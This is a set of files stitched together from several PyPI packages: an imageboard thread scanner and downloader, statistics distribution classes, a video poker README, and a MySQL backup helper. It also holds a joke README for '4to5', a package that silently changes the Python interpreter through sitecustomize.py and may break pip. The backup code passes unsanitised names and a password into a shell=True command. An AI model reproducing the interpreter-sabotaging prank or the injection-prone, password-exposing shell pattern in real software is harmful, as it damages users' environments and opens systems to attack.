get a list of all keywords to use in a search.
Returns:
list of all keywords to search for
"""
if 'keywords' in search:
keywords_array = []
if isinstance(search['keywords'], str):
keywords_array.append(search['keywords'])
else:
for keywords in search['keywords']:
keywords_array.append(keywords)
else:
self.logger.critical("Cannot scan without any keyword...")
exit(1)
return keywords_array
def scan(self):
"""
Start the scanning/download process.
"""
while True:
if self.quota_mb:
self.check_quota()
self.logger.info("Searching threads...")
try:
json_file = json.load(open(self.keywords_file))
except ValueError:
self.logger.critical("Your JSON file is malformed. Quitting.")
exit(1)
for search in json_file["searches"]:
# Getting imageboard to search
chan = self.get_imageboard(search)
# Checking conditions
condition = self.get_condition(search)
# Check if we need to check for duplicate when downloading
dupe_check = self.get_check_duplicate(search)
# Getting output folder name
folder_name = search["folder_name"]
# Get tag list (if any)
tag_list = self.get_tag_list(search)
# Get throttle
throttle = int(search['throttle']) if 'throttle' in search else 2
# if this is true we will search only the subject field
subject_only = self.get_subject_only(search)
wildcard = self.get_wildcard(search)
board = search["board"]
keywords = self.get_keyword(search)
try:
catalog_json = self.get_catalog_json(board, chan)
for keyword in keywords:
threads_id = self.scan_thread(keyword, catalog_json, subject_only, wildcard)
for thread_id in list(set(threads_id)):
if thread_id not in currently_downloading:
self.download_thread(thread_id, chan, board,
folder_name, self.output,
condition, dupe_check,
tag_list, throttle)
# Used to keep track of what is currently downloading
currently_downloading.append(thread_id)
except urllib.error.HTTPError as err:
self.logger.warning("Error while opening {0} catalog page. "
"Retrying during next scan.".format(board))
pass
active_downloads = threading.active_count()-1
self.logger.info("{0} threads currently downloading.".format(active_downloads))
self.logger.info("Searching again in {0} minutes!".format(str(int(self.wait_time / 60))))
time.sleep(self.wait_time) | 4scanner | /4scanner-1.6.3.tar.gz/4scanner-1.6.3/scanner/thread_scanner.py | thread_scanner.py |
import json
import logging
import os
from scanner import imageboard_info, dupecheck
from scanner.config import DB_FILE, currently_downloading
import sqlite3
import sys
import re
import time
import urllib
import http.client
import requests
import threading
import shutil
class downloader:
def __init__(self, thread_nb:int, board:str, imageboard:str, output_folder:str, folder:str, is_quiet:bool, condition:dict, check_duplicate:bool, tags:list, throttle:int, logger, single_run=False):
"""
class used for downloading a thread. Can be started after initialization by calling it's download() function.
Args:
thread_nb: the thread number of an imageboard thread. Ex: 809293
board: The board where the thread exist. Ex: 'g' for the 4chan technology board (http://boards.4channel.org/g/)
imageboard: The imageboard where the thread exist. Ex: 4chan
output_folder: directory where the pictures will be downloaded. Ex: /tmp/4scanner_img
folder: an optional directory name that can be specified for sorting image in the output_folder. Ex: pictures_of_computers
is_quiet: suppresses all logging.
condition: dict used when deciding which pictures to download. Ex: {"width": "=1920", "height": "=1080"}
check_duplicate: Avoid downloading duplicate that were already downloaded.
tags: this list of tags will be added a file called $PICTURE_NAME.txt for every pictures to help importing pictures to hydrus network
throttle: Time to wait, in second, between image downloads
logger: The logger to use with the class
single_run: Run the download loop only once, use if you don't want to wait for a thread to 404 before exiting.
"""
# Getting info about the imageboard URL
ib_info = imageboard_info.imageboard_info(imageboard)
base_url = ib_info.base_url
image_url = ib_info.image_base_url
thread_subfolder = ib_info.thread_subfolder
image_subfolder = ib_info.image_subfolder
# These URL are the url of the thread
# and the base url where images are stored on the imageboard
self.thread_url = "{0}{1}{2}{3}.json".format(base_url, board, thread_subfolder, thread_nb)
self.image_url = "{0}{1}{2}".format(image_url, board, image_subfolder)
self.tmp_dir = "/tmp/{0}/".format(os.getpid())
self.curr_time = time.strftime('%d%m%Y-%H%M%S')
self.pid = os.getpid()
self.thread = threading.current_thread().name
self.downloaded_log = "{0}/{1}4scanner_dld-{2}-{3}".format(self.tmp_dir, self.curr_time, self.pid, self.thread)
self.out_dir = os.path.join(output_folder, 'downloads', imageboard, board, folder, str(thread_nb))
self.thread_nb = thread_nb
self.imageboard = imageboard
self.board = board
self.condition = condition
self.check_duplicate = check_duplicate
self.is_quiet = is_quiet
self.tags = tags
self.throttle = int(throttle)
# Creating the tmp and output directory
os.makedirs(self.tmp_dir, exist_ok=True)
os.makedirs(self.out_dir, exist_ok=True)
self.single_run = single_run
self.logger = logger
# Main download function
def download(self):
"""
Start the download of all pictures.
It will return either when the thread 404, is archived, or if stopped by a special conditon such as single_run
"""
self.logger.info("{}: Starting download.".format(self.thread_url))
while True:
# Getting the thread's json
try:
thread_json = json.loads(self.get_thread_json())
except ValueError:
self.logger.critical("{}: Problem connecting to {0}. stopping download for thread {1}".format(self.thread_url, self.imageboard, self.thread_nb))
self.remove_thread_from_downloading()
self.remove_tmp_files()
exit(1)
# Checking if thread was archived, if it is it will be removed after the download loop
if thread_json["posts"][0].get("archived"):
if not self.is_quiet:
self.logger.info("{}: Thread is archived, getting images then quitting.".format(self.thread_url))
archived = True
else:
archived = False
# Image download loop
for post in thread_json["posts"]:
if 'filename' in post:
if not self.was_downloaded(post["tim"]):
if self.meet_dl_condition(post):
tmp_pic = self.download_image(post)
final_pic = os.path.join(self.out_dir, tmp_pic.split('/')[-1])
self.add_to_downloaded_log(post["tim"])
if self.check_duplicate:
# If picture is not a duplicate copy it to out_dir
if not self.remove_if_duplicate(tmp_pic):
shutil.move(tmp_pic, final_pic)
self.add_tag_file(final_pic + ".txt")
else:
shutil.move(tmp_pic, final_pic)
self.add_tag_file(final_pic + ".txt")
time.sleep(self.throttle)
# Some imageboards allow more than 1 picture per post
if 'extra_files' in post:
for picture in post["extra_files"]:
if not self.was_downloaded(picture["tim"]):
if self.meet_dl_condition(picture):
tmp_pic = self.download_image(picture)
final_pic = os.path.join(self.out_dir, tmp_pic.split('/')[-1])
self.add_to_downloaded_log(picture["tim"])
if self.check_duplicate:
# If picture is not a duplicate copy it to out_dir
if not self.remove_if_duplicate(tmp_pic):
shutil.move(tmp_pic, final_pic)
self.add_tag_file(final_pic + ".txt")
else:
shutil.move(tmp_pic, final_pic)
self.add_tag_file(final_pic + ".txt")
time.sleep(self.throttle)
if archived or self.single_run:
self.remove_thread_from_downloading()
self.remove_tmp_files()
exit(0)
time.sleep(20)
def remove_thread_from_downloading(self):
"""
Remove a thread from the global download list currently_downloading.
No effect if this list is not defined (for example 4downloader does not use it)
"""
# In a try except because 4downloader does not store threads in this list
try:
scanner.currently_downloading.remove(self.thread_nb)
except NameError as e:
pass
def add_thread_to_downloaded(self):
"""
Add a thread to the Downloaded_Thread table of 4scanner.
"""
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
c.execute("INSERT INTO Downloaded_Thread (Thread_Number, Imageboard, Board) VALUES (?, ?, ?)",
(self.thread_nb, self.imageboard, self.board))
conn.commit()
conn.close()
def get_thread_json(self):
"""
Get the json definition of the imageboard thread currently being downloaded.
If the imageboard returns a 404 it will stop the downloading process.
Returns:
String containing the info of the thread in JSON
"""
response = requests.get(self.thread_url)
if response.status_code == 404:
if not self.is_quiet:
self.logger.info("{}: thread 404\'d, stopping download".format(self.thread_url))
self.remove_thread_from_downloading()
self.add_thread_to_downloaded()
exit(0)
return response.text
def add_to_downloaded_log(self, img_filename):
"""
Write the provided image filename to the log file defined in downloader.
"""
f = open(self.downloaded_log, "a")
f.write("{0}\n".format(img_filename))
f.close()
def was_downloaded(self, img_filename:str):
"""
Check if the image was already downloaded during this run.
Returns:
True if it was already downloaded, False otherwise
"""
if os.path.isfile(self.downloaded_log):
f = open(self.downloaded_log, "r")
if str(img_filename) in f.read():
f.close()
return True
else:
return False
else:
return False
def extension_condition(self, condition_ext:str, post_ext:str):
"""
Check if the extension condition match with the post_ext extension.
Returns:
True if it matches, False otherwise
"""
if condition_ext:
for extension in condition_ext:
if extension == post_ext:
return True
else:
# Always return true if condition was not specified
return True
return False
def filename_condition(self, condition_filename:str, post_filename:str):
"""
Check if the filename condition match with the post_filename filename.
Returns:
True if it matches, False otherwise
"""
if condition_filename:
for i in condition_filename:
if i.lower() in post_filename.lower():
return True
else:
# Always return true if condition was not specified
return True
return False
def width_condition(self, condition_width:str, post_width:str):
"""
Check if the width condition match with the post_width width.
Returns:
True if it matches, False otherwise
"""
if condition_width:
if condition_width[0] == "=":
if int(post_width) == int(condition_width.split("=")[-1]):
return True
elif condition_width[0] == "<":
if int(post_width) < int(condition_width.split("<")[-1]):
return True
elif condition_width[0] == ">":
if int(post_width) > int(condition_width.split(">")[-1]):
return True
else:
self.logger.critical("{}: width need to be in this format: >1024, <256 or =1920".format(self.thread_url))
exit(1)
else:
# Always return true if condition was not specified
return True
return False
def height_condition(self, condition_height:str, post_height:str):
"""
Check if the height condition match with the post_height height.
Returns:
True if it matches, False otherwise
"""
if condition_height:
if condition_height[0] == "=":
if int(post_height) == int(condition_height.split("=")[-1]):
return True
elif condition_height[0] == "<":
if int(post_height) < int(condition_height.split("<")[-1]):
return True
elif condition_height[0] == ">":
if int(post_height) > int(condition_height.split(">")[-1]):
return True
else:
self.logger.critical("{}: height need to be in this format: >1024, <256 or =1080".format(self.thread_url))
exit(1)
else:
# Always return true if condition was not specified
return True
return False
# Check if all condition returned true
def all_condition_check(self, condition_list):
"""
Check if each element of the list is True. There is probably a better way to do this.
Returns:
True if it matches, False otherwise
"""
for i in condition_list:
if not i:
return False
return True
# Return True if an image fit all search conditions
def meet_dl_condition(self, post):
"""
Check if a picture matches all download conditions.
Returns:
True if it does, False otherwise
"""
condition_list = []
condition_list.append(self.extension_condition(self.condition["ext"], post['ext']))
condition_list.append(self.width_condition(self.condition["width"], post['w']))
condition_list.append(self.height_condition(self.condition["height"], post['h']))
condition_list.append(self.filename_condition(self.condition["filename"], post['filename']))
return self.all_condition_check(condition_list)
def remove_if_duplicate(self, img_path):
"""
Remove an image if it was already downloaded
Returns:
True if the image was removed, False otherwise
"""
if img_path:
img_hash = dupecheck.hash_image(img_path)
if dupecheck.is_duplicate(img_hash):
os.remove(img_path)
return True
else:
dupecheck.add_to_db(img_hash, self.thread_nb)
return False
def remove_tmp_files(self):
"""
Remove the temporary log file used to know which pictures had been downloaded.
"""
if os.path.isfile(self.downloaded_log):
os.unlink(self.downloaded_log)
# Return downloaded picture path or false if an error occured
def download_image(self, post_dic:dict):
"""
Download an image from a post (dict)
Returns:
The downloaded picture path or False if an error occured
"""
try:
pic_url = self.image_url + str(post_dic["tim"]) + post_dic["ext"]
out_pic = os.path.join(self.tmp_dir, str(post_dic["tim"]) + post_dic["ext"])
urllib.request.urlretrieve(pic_url, out_pic)
except urllib.error.HTTPError as err:
return False
return out_pic
def add_tag_file(self, tag_file:str):
"""
Create a tag file at the given path with the tags from the object.
"""
if self.tags:
with open(tag_file, 'w') as f:
for tag in self.tags:
f.write(tag + "\n") | 4scanner | /4scanner-1.6.3.tar.gz/4scanner-1.6.3/scanner/downloader.py | downloader.py |
4to5 - Replace the number 4 with the number 5.
==============================================
Unlike 2to3, this module finally does what it says! Replaces two numbers on your
interpreter. It's a true life-saver for both you and your colleagues.
Usage
======
.. code-block:: python
pip install 4to5
python
>>> 2 + 2
5
>>> 3 + 1
5
>>> 3 + 2 == 3 + 1
True
>>> 4 - 2
3
>> 4 - 1 # Cause 4-1 == 5-1 == 4 == 5
5
>>> for i in range(10):
... print(i)
...
0
1
2
3
5
5
6
7
8
9
Notes
=====
50% chance you won't be able to remove it, as apparently the number 4 is
impotant for pip, and without it pip doesn't seem to work properly.
To manually uninstall, delete ``sitecustomize.py`` from your ``site-packages`` directory.
Maybe I'll add a ``fix_my_system.py`` file in the future to remove it without using
the number 4.
Supports virtual environments.
Enjoy! | 4to5 | /4to5-0.0.1.tar.gz/4to5-0.0.1/README.rst | README.rst |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Gaussian(Distribution):
""" Gaussian distribution class for calculating and
visualizing a Gaussian distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats extracted from the data file
"""
def __init__(self, mu=0, sigma=1):
Distribution.__init__(self, mu, sigma)
def calculate_mean(self):
"""Function to calculate the mean of the data set.
Args:
None
Returns:
float: mean of the data set
"""
avg = 1.0 * sum(self.data) / len(self.data)
self.mean = avg
return self.mean
def calculate_stdev(self, sample=True):
"""Function to calculate the standard deviation of the data set.
Args:
sample (bool): whether the data represents a sample or population
Returns:
float: standard deviation of the data set
"""
if sample:
n = len(self.data) - 1
else:
n = len(self.data)
mean = self.calculate_mean()
sigma = 0
for d in self.data:
sigma += (d - mean) ** 2
sigma = math.sqrt(sigma / n)
self.stdev = sigma
return self.stdev
def plot_histogram(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.hist(self.data)
plt.title('Histogram of Data')
plt.xlabel('data')
plt.ylabel('count')
def pdf(self, x):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
return (1.0 / (self.stdev * math.sqrt(2*math.pi))) * math.exp(-0.5*((x - self.mean) / self.stdev) ** 2)
def plot_histogram_pdf(self, n_spaces = 50):
"""Function to plot the normalized histogram of the data and a plot of the
probability density function along the same range
Args:
n_spaces (int): number of data points
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
mu = self.mean
sigma = self.stdev
min_range = min(self.data)
max_range = max(self.data)
# calculates the interval between x values
interval = 1.0 * (max_range - min_range) / n_spaces
x = []
y = []
# calculate the x values to visualize
for i in range(n_spaces):
tmp = min_range + interval*i
x.append(tmp)
y.append(self.pdf(tmp))
# make the plots
fig, axes = plt.subplots(2,sharex=True)
fig.subplots_adjust(hspace=.5)
axes[0].hist(self.data, density=True)
axes[0].set_title('Normed Histogram of Data')
axes[0].set_ylabel('Density')
axes[1].plot(x, y)
axes[1].set_title('Normal Distribution for \n Sample Mean and Sample Standard Deviation')
axes[0].set_ylabel('Density')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Gaussian distributions
Args:
other (Gaussian): Gaussian instance
Returns:
Gaussian: Gaussian distribution
"""
result = Gaussian()
result.mean = self.mean + other.mean
result.stdev = math.sqrt(self.stdev ** 2 + other.stdev ** 2)
return result
def __repr__(self):
"""Function to output the characteristics of the Gaussian instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}".format(self.mean, self.stdev) | 5-Rakoto031-upload-to-pypi | /5_Rakoto031_upload_to_pypi-0.1.tar.gz/5_Rakoto031_upload_to_pypi-0.1/5_Rakoto031_upload_to_pypi/Gaussiandistribution.py | Gaussiandistribution.py |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
""" Binomial distribution class for calculating and
visualizing a Binomial distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats to be extracted from the data file
p (float) representing the probability of an event occurring
n (int) number of trials
TODO: Fill out all functions below
"""
def __init__(self, prob=.5, size=20):
self.n = size
self.p = prob
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self):
"""Function to calculate the mean from p and n
Args:
None
Returns:
float: mean of the data set
"""
self.mean = self.p * self.n
return self.mean
def calculate_stdev(self):
"""Function to calculate the standard deviation from p and n.
Args:
None
Returns:
float: standard deviation of the data set
"""
self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
return self.stdev
def replace_stats_with_data(self):
"""Function to calculate p and n from the data set
Args:
None
Returns:
float: the p value
float: the n value
"""
self.n = len(self.data)
self.p = 1.0 * sum(self.data) / len(self.data)
self.mean = self.calculate_mean()
self.stdev = self.calculate_stdev()
def plot_bar(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
plt.title('Bar Chart of Data')
plt.xlabel('outcome')
plt.ylabel('count')
def pdf(self, k):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
b = (self.p ** k) * (1 - self.p) ** (self.n - k)
return a * b
def plot_bar_pdf(self):
"""Function to plot the pdf of the binomial distribution
Args:
None
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
x = []
y = []
# calculate the x values to visualize
for i in range(self.n + 1):
x.append(i)
y.append(self.pdf(i))
# make the plots
plt.bar(x, y)
plt.title('Distribution of Outcomes')
plt.ylabel('Probability')
plt.xlabel('Outcome')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Binomial distributions with equal p
Args:
other (Binomial): Binomial instance
Returns:
Binomial: Binomial distribution
"""
try:
assert self.p == other.p, 'p values are not equal'
except AssertionError as error:
raise
result = Binomial()
result.n = self.n + other.n
result.p = self.p
result.calculate_mean()
result.calculate_stdev()
return result
def __repr__(self):
"""Function to output the characteristics of the Binomial instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}, p {}, n {}".\
format(self.mean, self.stdev, self.p, self.n) | 5-Rakoto031-upload-to-pypi | /5_Rakoto031_upload_to_pypi-0.1.tar.gz/5_Rakoto031_upload_to_pypi-0.1/5_Rakoto031_upload_to_pypi/Binomialdistribution.py | Binomialdistribution.py |
<a name="readme-top"></a>
<!-- VideoPoker-5CardRedraw -->
[![Contributors][contributors-shield]][contributors-url]
[![Forks][forks-shield]][forks-url]
[![Stargazers][stars-shield]][stars-url]
[![Issues][issues-shield]][issues-url]
[![MIT License][license-shield]][license-url]
[![LinkedIn][linkedin-shield]][linkedin-url]
<!-- PROJECT LOGO -->
<br />
<div align="center">
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw">
<img src="documentation/logo.png" alt="Logo" width="80" height="80">
</a>
<h3 align="center">VideoPoker-5CardRedraw</h3>
<p align="center">
A pythonic creation of a 5 card redraw video poker.
<br />
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw"><strong>Explore the docs »</strong></a>
<br />
<br />
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw">View Demo</a>
·
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw/issues">Report Bug</a>
·
<a href="https://github.com/ralbee1/VideoPoker-5CardRedraw/issues">Request Feature</a>
</p>
</div>
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li>
<a href="#about-the-project">About The Project</a>
<ul>
<li><a href="#built-with">Built With</a></li>
<li><a href="#Features">Features</a></li>
</ul>
</li>
<li>
<a href="#getting-started">Getting Started</a>
<ul>
<li><a href="#prerequisites">Prerequisites</a></li>
<li><a href="#installation">Installation</a></li>
</ul>
</li>
<li><a href="#usage">Usage</a></li>
<li><a href="#contact">Contact</a></li>
<li><a href="#acknowledgments">Acknowledgments</a></li>
</ol>
</details>
<!-- ABOUT THE PROJECT -->
## About The Project
<!--
[![Product Name Screen Shot][product-screenshot]](https://example.com)
-->
5 Card Draw is a playable Python 5 card draw poker application. This project served as a hands-on Python learning experience in 2021. On my journey, I learned about creating graphical user interfaces in python, pythonic best practices, CI/CD workflows, PyPi deployments, and much more. The beautiful learning opportunity provided this project was balancing desired learning opportunities and refining 5 Card Draw into a polished application. This project is currently archived with the last remaining features involved further polishing the UI/UX experience, adding sound, and cashing out player credits. If I were to start over, I'd rank poker hands with a symantic system over a integer score.
<p align="right">(<a href="#readme-top">back to top</a>)</p>
### Features
- [ ] **5 Card Redraw**
- [ ] Modular Hand Ranking and Scoring
- [ ] Player Hand and Deck creation
- [ ] Playable GUI interface
- [ ] Bank text file
- [ ] **PyPi Installs**
- [ ] **Pep 8 Standards**
- [ ] **GitHub CI/CD Pipelines**
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- GETTING STARTED -->
## Getting Started
The following is an guide for running 5 card redraw poker locally.
### Prerequisites
1. [Python 3.10.8 or Newer](https://www.python.org/downloads/release/python-3108/)
### Installation
Developer Install:
<br/>
Summary: The developer install is for those who want to contribute to or clone VideoPoker-5CardRedraw.
1. Clone the repo (or use Github Desktop)
```sh
git clone https://github.com/ralbee1/VideoPoker-5CardRedraw.git
```
2. Open the CLI and navigate the current working directory to where you cloned VideoPoker-5CardDraw
3. Install the Pip Package from the CLI, copy and run this command:
```sh
py -m pip install -e .
```
<br/>
<br/>
User Install
<br/>
1. Automatic User Install from the Command line via PyPi.
```sh
pip install 5-card-draw
```
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- USAGE EXAMPLES -->
## Usage / How to Play
If your python files open with Python by default then from the commmand line run:
```js
video_poker.py;
```
The game is played by aiming to make the best poker hand possible. The top of the interface shows the hand ranking and the payouts sorted by how many credits you bet per round, 1 thru 5. To begin, click DEAL. You hold cards with the intent of keeping them and drawing new cards to try to improve your hand ranking. After drawing new cards, your hand is automatically scored and profits are payed out. You may then click "DEAL" and start over.
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
* []()Email - ralbee1@iwu.edu
* []()Project Link: [https://github.com/ralbee1/VideoPoker-5CardRedraw](https://github.com/ralbee1/VideoPoker-5CardRedraw)
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* []() This variant of poker was inspired by Super Double Double as found in Las Vegas Casinos.
<p align="right">(<a href="#readme-top">back to top</a>)</p>
<!-- MARKDOWN LINKS & IMAGES -->
<!-- https://www.markdownguide.org/basic-syntax/#reference-style-links -->
[contributors-shield]: https://img.shields.io/github/contributors/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[contributors-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/graphs/contributors
[forks-shield]: https://img.shields.io/github/forks/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[forks-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/network/members
[stars-shield]: https://img.shields.io/github/stars/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[stars-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/stargazers
[issues-shield]: https://img.shields.io/github/issues/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[issues-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/issues
[license-shield]: https://img.shields.io/github/license/ralbee1/VideoPoker-5CardRedraw.svg?style=for-the-badge
[license-url]: https://github.com/ralbee1/VideoPoker-5CardRedraw/blob/master/LICENSE.txt
[linkedin-shield]: https://img.shields.io/badge/-LinkedIn-black.svg?style=for-the-badge&logo=linkedin&colorB=555
[linkedin-url]: https://linkedin.com/in/Richard-Albee
[product-screenshot]: images/screenshot.png
[python.org]: https://www.python.org/static/img/python-logo.png
[python-url]: https://www.python.org/
[pypi.org]: https://pypi.org/static/images/logo-small.2a411bc6.svg
[pypi-url]: https://pypi.org/project/pip/
| 5-card-draw | /5_card_draw-1.0.2.tar.gz/5_card_draw-1.0.2/README.md | README.md |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Gaussian(Distribution):
""" Gaussian distribution class for calculating and
visualizing a Gaussian distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats extracted from the data file
"""
def __init__(self, mu=0, sigma=1):
Distribution.__init__(self, mu, sigma)
def calculate_mean(self):
"""Function to calculate the mean of the data set.
Args:
None
Returns:
float: mean of the data set
"""
avg = 1.0 * sum(self.data) / len(self.data)
self.mean = avg
return self.mean
def calculate_stdev(self, sample=True):
"""Function to calculate the standard deviation of the data set.
Args:
sample (bool): whether the data represents a sample or population
Returns:
float: standard deviation of the data set
"""
if sample:
n = len(self.data) - 1
else:
n = len(self.data)
mean = self.calculate_mean()
sigma = 0
for d in self.data:
sigma += (d - mean) ** 2
sigma = math.sqrt(sigma / n)
self.stdev = sigma
return self.stdev
def plot_histogram(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.hist(self.data)
plt.title('Histogram of Data')
plt.xlabel('data')
plt.ylabel('count')
def pdf(self, x):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
return (1.0 / (self.stdev * math.sqrt(2*math.pi))) * math.exp(-0.5*((x - self.mean) / self.stdev) ** 2)
def plot_histogram_pdf(self, n_spaces = 50):
"""Function to plot the normalized histogram of the data and a plot of the
probability density function along the same range
Args:
n_spaces (int): number of data points
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
mu = self.mean
sigma = self.stdev
min_range = min(self.data)
max_range = max(self.data)
# calculates the interval between x values
interval = 1.0 * (max_range - min_range) / n_spaces
x = []
y = []
# calculate the x values to visualize
for i in range(n_spaces):
tmp = min_range + interval*i
x.append(tmp)
y.append(self.pdf(tmp))
# make the plots
fig, axes = plt.subplots(2,sharex=True)
fig.subplots_adjust(hspace=.5)
axes[0].hist(self.data, density=True)
axes[0].set_title('Normed Histogram of Data')
axes[0].set_ylabel('Density')
axes[1].plot(x, y)
axes[1].set_title('Normal Distribution for \n Sample Mean and Sample Standard Deviation')
axes[0].set_ylabel('Density')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Gaussian distributions
Args:
other (Gaussian): Gaussian instance
Returns:
Gaussian: Gaussian distribution
"""
result = Gaussian()
result.mean = self.mean + other.mean
result.stdev = math.sqrt(self.stdev ** 2 + other.stdev ** 2)
return result
def __repr__(self):
"""Function to output the characteristics of the Gaussian instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}".format(self.mean, self.stdev) | 5090-distributions | /5090_distributions-0.1.tar.gz/5090_distributions-0.1/5090_distributions/Gaussiandistribution.py | Gaussiandistribution.py |
import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
class Binomial(Distribution):
""" Binomial distribution class for calculating and
visualizing a Binomial distribution.
Attributes:
mean (float) representing the mean value of the distribution
stdev (float) representing the standard deviation of the distribution
data_list (list of floats) a list of floats to be extracted from the data file
p (float) representing the probability of an event occurring
n (int) number of trials
TODO: Fill out all functions below
"""
def __init__(self, prob=.5, size=20):
self.n = size
self.p = prob
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self):
"""Function to calculate the mean from p and n
Args:
None
Returns:
float: mean of the data set
"""
self.mean = self.p * self.n
return self.mean
def calculate_stdev(self):
"""Function to calculate the standard deviation from p and n.
Args:
None
Returns:
float: standard deviation of the data set
"""
self.stdev = math.sqrt(self.n * self.p * (1 - self.p))
return self.stdev
def replace_stats_with_data(self):
"""Function to calculate p and n from the data set
Args:
None
Returns:
float: the p value
float: the n value
"""
self.n = len(self.data)
self.p = 1.0 * sum(self.data) / len(self.data)
self.mean = self.calculate_mean()
self.stdev = self.calculate_stdev()
def plot_bar(self):
"""Function to output a histogram of the instance variable data using
matplotlib pyplot library.
Args:
None
Returns:
None
"""
plt.bar(x = ['0', '1'], height = [(1 - self.p) * self.n, self.p * self.n])
plt.title('Bar Chart of Data')
plt.xlabel('outcome')
plt.ylabel('count')
def pdf(self, k):
"""Probability density function calculator for the gaussian distribution.
Args:
x (float): point for calculating the probability density function
Returns:
float: probability density function output
"""
a = math.factorial(self.n) / (math.factorial(k) * (math.factorial(self.n - k)))
b = (self.p ** k) * (1 - self.p) ** (self.n - k)
return a * b
def plot_bar_pdf(self):
"""Function to plot the pdf of the binomial distribution
Args:
None
Returns:
list: x values for the pdf plot
list: y values for the pdf plot
"""
x = []
y = []
# calculate the x values to visualize
for i in range(self.n + 1):
x.append(i)
y.append(self.pdf(i))
# make the plots
plt.bar(x, y)
plt.title('Distribution of Outcomes')
plt.ylabel('Probability')
plt.xlabel('Outcome')
plt.show()
return x, y
def __add__(self, other):
"""Function to add together two Binomial distributions with equal p
Args:
other (Binomial): Binomial instance
Returns:
Binomial: Binomial distribution
"""
try:
assert self.p == other.p, 'p values are not equal'
except AssertionError as error:
raise
result = Binomial()
result.n = self.n + other.n
result.p = self.p
result.calculate_mean()
result.calculate_stdev()
return result
def __repr__(self):
"""Function to output the characteristics of the Binomial instance
Args:
None
Returns:
string: characteristics of the Gaussian
"""
return "mean {}, standard deviation {}, p {}, n {}".\
format(self.mean, self.stdev, self.p, self.n) | 5090-distributions | /5090_distributions-0.1.tar.gz/5090_distributions-0.1/5090_distributions/Binomialdistribution.py | Binomialdistribution.py |
import pymysql
import time
import os
import subprocess
import logging
__all__ = ["PyMysqlDB"]
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s [%(levelname)s] %(funcName)s: %(message)s',
datefmt="%d %b %Y %H:%M:%S")
class PyMysqlDB:
def __init__(self, host=None, user=None, pwd=None, port=3306, base_path=None, backup_path='/data/LocalBackup'):
self.host = host
self.user = user
self.pwd = pwd
self.port = int(port)
self.base_path = base_path
self.backup_path = backup_path
def select_database(self):
db_list = []
con = pymysql.connect(host=self.host, user=self.user, password=self.pwd, db='information_schema',
port=self.port)
cur = con.cursor()
cur.execute('select SCHEMA_NAME from SCHEMATA')
for (db,) in cur.fetchall():
db_list.append(db)
return db_list
def backup_by_database(self, database):
logging.info('backup database: {}'.format(database))
today = time.strftime("%Y%m%d", time.localtime())
backup_dir = '{}/{}'.format(self.backup_path, today)
if not os.path.isdir(backup_dir):
os.makedirs(backup_dir)
os.chdir(backup_dir)
start_time = int(time.time())
cmd = "{}/bin/mysqldump --opt -h{} -P{} -u{} -p{} {} | gzip > {}/{}/{}-{}-{}.sql.gz".format(self.base_path,
self.host,
self.port,
self.user, self.pwd,
database,
self.backup_path,
today, today,
self.host,
database)
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
content = result.stdout.read()
if content and not content.decode().startswith("Warning:"):
subject = "{} - {} backup error, reason: {}".format(self.host, database, content.decode())
logging.error(subject)
end_time = int(time.time())
use_time = end_time - start_time
logging.info('{} - {} backup finished, use time: {}s'.format(self.host, database, float('%.2f' % use_time)))
